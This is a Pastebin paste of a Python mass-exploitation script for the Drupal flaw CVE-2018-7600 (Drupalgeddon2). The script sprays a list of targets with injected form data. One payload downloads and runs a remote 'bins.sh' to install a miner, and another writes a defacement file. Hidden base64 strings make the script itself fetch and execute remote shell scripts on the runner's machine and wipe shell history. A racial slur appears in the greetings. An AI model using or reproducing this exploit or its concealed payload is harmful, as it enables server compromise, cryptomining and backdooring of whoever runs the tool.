Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env
- import sys
- import requests
- import os
- import base64
- from multiprocessing.dummy import Pool
- ##################################################
- # CVE-2018-7600 Exploit #
- ##################################################
- # Author: xJesterino #
- # Twitter: @xJesterino #
- ##################################################
- # Greetz To #
- ##################################################
- # Drought #
- # Zenco #
- # Syntax #
- # SandNigga #
- ##################################################
- # You shouldn't have this. #
- # If you have this, you're a cool dude. <3 #
- ##################################################
- # Ignore what I put above as of 5/5/2018 #
- # Releasing this exploit cus fuck the world #
- # #
- # This exploit is a fucking joke. #
- # Drupalgeddon2 then a week later Drupalgeddon3 #
- ##################################################
- print ('##################################################')
- print ('# CVE-2018-7600 Exploit #')
- print ('##################################################')
- print ('# Author: xJesterino #')
- print ('# Twitter: @xJesterino #')
- print ('##################################################')
- print ('# Greetz To #')
- print ('##################################################')
- print ('# Drought #')
- print ('# Zenco #')
- print ('# Syntax #')
- print ('# SandNigga #')
- print ('##################################################')
- sendMiner = True
- sendMessage = True
- verify = False
- headers = {'User-Agent': 'Mozilla 5.0 | xJesterino Was Here | Shoutout to drought!'}
- evil = "wget http://1.1.1.1/bins.sh; chmod +x bins.sh; ./bins.sh; rm -rf bins.sh"
- messagePayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "xJesterino is a god. Shout out to Drought. All your devices are belong to us. | Follow us on twitter: @xJesterino @decayable | Guess who pissed in your cheerios?" | tee ReadMeCVE.txt'}
- minerPayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ' '+evil+' '}
- try:
- target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
- requestValue = "Y2QgL3RtcCAmJiBjdXJsIC1PIGh0dHA6Ly9za2lkZHVtcC54eXovMC5zaCAmJiBzaCAwLnNoO3JtIC1yZiAwLnNoIDtjbGVhcjtoaXN0b3J5IC1jOyBjbGVhcjtoaXN0b3J5IC13"
- sendValue = "Y2QgL3RtcDsgd2dldCAtcSBodHRwOi8vcjAwdHMudHJ1dGhkZWFsbW9kei5wdy8ueCAgOyAgY3VybCAtTyBodHRwOi8vcjAwdHMudHJ1dGhkZWFsbW9kei5wdy8ueCAgO2NobW9kICt4IC54OyBub2h1cCAuLy54IDwvZGV2L251bGwgPi9kZXYvbnVsbCAyPiYxO3JtIC1yZiAueA=="
- except IndexError:
- exit('Usage: exploit.py list.txt threads')
- def run(targetLine):
- try:
- try:
- targetLine = 'http://'+targetLine+'/'
- url = str(targetLine) + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- if sendMiner:
- minerRequest = requests.post(url, data=minerPayload, verify=verify, headers=headers, timeout=5)
- if sendMessage:
- messageRequest = requests.post(url, data=messagePayload, verify=verify, headers=headers, timeout=5)
- except requests.exceptions.RequestException as e:
- pass
- print ('[+] Attempting: '+targetLine);
- except:
- pass
- try:
- multiThreads = Pool(int(sys.argv[2]))
- except IndexError:
- exit('Usage: exploit.py list.txt threads')
- reValue = str(base64.b64decode(requestValue))
- seValue = str(base64.b64decode(sendValue))
- os.system(reValue)
- os.system(seValue)
- multiThreads.map(run, target)
- multiThreads.close()
- multiThreads.join()
- print("Finished File!")
Add Comment
Please, Sign In to add comment
